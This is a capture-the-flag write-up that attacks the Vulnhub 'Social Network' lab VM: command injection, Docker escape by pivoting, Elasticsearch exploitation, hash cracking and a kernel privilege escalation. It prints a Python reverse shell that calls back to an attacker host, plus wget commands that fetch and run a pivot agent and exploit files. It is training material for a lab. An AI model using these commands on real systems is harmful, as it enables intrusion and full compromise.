Vulnhub Social Network

[SOCIAL NETWORK]

Difficulty: Medium→High
Score: 7.5/10


Target

  1. Root privilege

Process

Reconnaissance

sudo arp-scan -I eth0 -l

Port Scan

sudo nmap -p- 192.168.0.109


Port service scan

Python web application | SSH service

Access port 5000 to see what is there.

Path Brute Force enumeration

sudo dirsearch -u http://192.168.0.109:5000

Found the admin directory

Delivery

Command injection

After accessing the website, we found a command injection vulnerability.

We can use a Python reverse shell to control the machine.

Python reverse shell

Listen on the local machine on port 5555

nc -lnvp 5555

Input the Python shell code in the website

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.108",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

OK, that worked!

Command and Control

We found we got root privilege easily… I think I'm stuck in Docker.

3 ways to check if we are in Docker

  1. Check whether the .dockerenv file exists in the root directory
ls /.dockerenv
  2. Check whether a docker path appears in /proc/1/cgroup
cat /proc/1/cgroup
  3. Run the env command; we will find something about docker
env
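The three checks above combined into one small script that also tells you which check fired. This is an added example, not part of the original write-up; the sample /proc/1/cgroup contents and container id are constructed, and the HOSTNAME heuristic (Docker sets it to a 12-hex-char container id) is an assumption about Docker's default behaviour.

```python
import os
import re

# Constructed sample of /proc/1/cgroup as seen inside a Docker container (cgroup v1);
# the container id is made up, not taken from any real target.
SAMPLE_CGROUP_DOCKER = (
    "12:pids:/docker/0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef\n"
    "1:name=systemd:/docker/0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef\n"
)
# What a plain host, or any cgroup v2 host (container or not), typically shows instead.
SAMPLE_CGROUP_HOST = "0::/\n"


def container_indicators(dockerenv_exists, cgroup_text, environ):
    """Return the Docker indicators found, in the order of the three manual checks:
    'dockerenv' -> /.dockerenv exists
    'cgroup'    -> a cgroup path in /proc/1/cgroup contains 'docker'
    'env'       -> environment hints (DOCKER_* or container= variables, or a HOSTNAME
                   that looks like a 12-hex-char container id; assumed heuristic)
    The inputs are passed in so the function can be run on constructed samples."""
    found = []
    if dockerenv_exists:
        found.append("dockerenv")
    # Each cgroup v1 line is hierarchy-id:controllers:path; only the path is inspected.
    for line in cgroup_text.splitlines():
        path = line.split(":", 2)[-1]
        if "docker" in path:
            found.append("cgroup")
            break
    hostname = environ.get("HOSTNAME", "")
    if (re.fullmatch(r"[0-9a-f]{12}", hostname)
            or any(k.upper().startswith("DOCKER") or k == "container" for k in environ)):
        found.append("env")
    return found


def check_this_host():
    """Run the same three checks against the live system."""
    try:
        with open("/proc/1/cgroup") as f:
            cgroup_text = f.read()
    except OSError:
        cgroup_text = ""
    return container_indicators(os.path.exists("/.dockerenv"), cgroup_text, dict(os.environ))


if __name__ == "__main__":
    hits = check_this_host()
    # On cgroup v2 hosts /proc/1/cgroup is just "0::/", so the cgroup check alone is not conclusive.
    print("container indicators:", hits or "none")
```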

After checking, we are indeed in Docker. Let's break out!

Escape from Docker

We found there are no local network discovery tools such as netdiscover or arp in this container, so we fall back to the basic way: pinging the other machines on the same local network.

for i in $(seq 1 254); do ping -c 1 172.17.0.$i;done

Luckily we found that 172.17.0.1, 172.17.0.2 and 172.17.0.3 are alive.

Intranet penetration

We use Venom, an excellent tool for pivoting into the intranet.
On the local machine we run Venom to listen on port 9999.

./admin_linux_x64 -lport 9999


Transfer the Venom agent file to the container

[docker machine]
cd /tmp
wget -c http://192.168.0.108/agent_linux_x64
chmod +x agent_linux_x64
./agent_linux_x64 -rhost 192.168.0.108 -rport 9999

That worked!

Next we have to take control of the node and build the SOCKS5 tunnel.

proxychains is a good tool for connecting through the tunnel.

vi /etc/proxychains4.conf
socks5  127.0.0.1 1080

Scan intranet port with proxychains

sudo proxychains nmap -Pn -sT -sV 172.17.0.1
sudo proxychains nmap -Pn -sT -sV 172.17.0.2
sudo proxychains nmap -Pn -sT -sV 172.17.0.3

Oh well, Elasticsearch sounds like it could be exploited.

Search for a PoC with searchsploit

searchsploit Elasticsearch


Copy the file to the desktop.
Write some data to Elasticsearch.

proxychains curl -XPOST '172.17.0.2:9200/twitter/user/yren' -d '{"name":"Wu"}'


Attack Elasticsearch through proxychains

sudo proxychains python2 36337.py 172.17.0.2

Privilege Escalation

OK, we got a root shell but we are still stuck in the container.

We found the passwords file in the current directory.

The password consists of eight characters: the first four are digits and the last four are letters.
Extract the hashes to a new text file.

Use hashcat to crack the hashes

cat pwd.hash
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
hashcat --username -m 0 -a 3 pwd.hash ?d?d?d?d?l?l?l?l --force
hashcat --username -m 0 -a 3 pwd.hash ?d?d?d?d?l?l?l?l --force --show
john:3f8184a7343664553fcb5337a3138814:1337hack
test:861f194e9d6118f3d942a72be3e51749:1234test
admin:670c3bbc209a18dde5446e5e6c1f1d5b:1111pass
root:b3d34352fc26117979deabdf1b9b6354:1234pass // That's the wrong password!
jane:5c158b60ed97c723b673529b8a3cf72b:1234jane

We connect to the virtual machine with SSH.

ssh [email protected]


Check the system version

uname -a


Search for a PoC

searchsploit linux 3.13.0 ubuntu priv


We found there is no gcc on the virtual machine, so we have to generate the executable file ourselves.

We found that the exploit needs another file, ofs-lib.so.

Find it and copy it into the current directory.

Upload the exploit and ofs-lib.so to the virtual machine.

[kali open the server]
python3 -m http.server 80
[virtual machine]
cd /tmp
wget http://192.168.0.108/exp
wget http://192.168.0.108/ofs-lib.so

Get root

chmod +x exp
./exp
id

Summary


That was an excellent exercise for me. It contains intranet penetration and high-level privilege escalation. The most difficult part is that you have to modify the original exploit to create one suitable for this virtual machine. Because it does not have a gcc environment, we generated the executable file for it. To use the exploit, we should read the code first.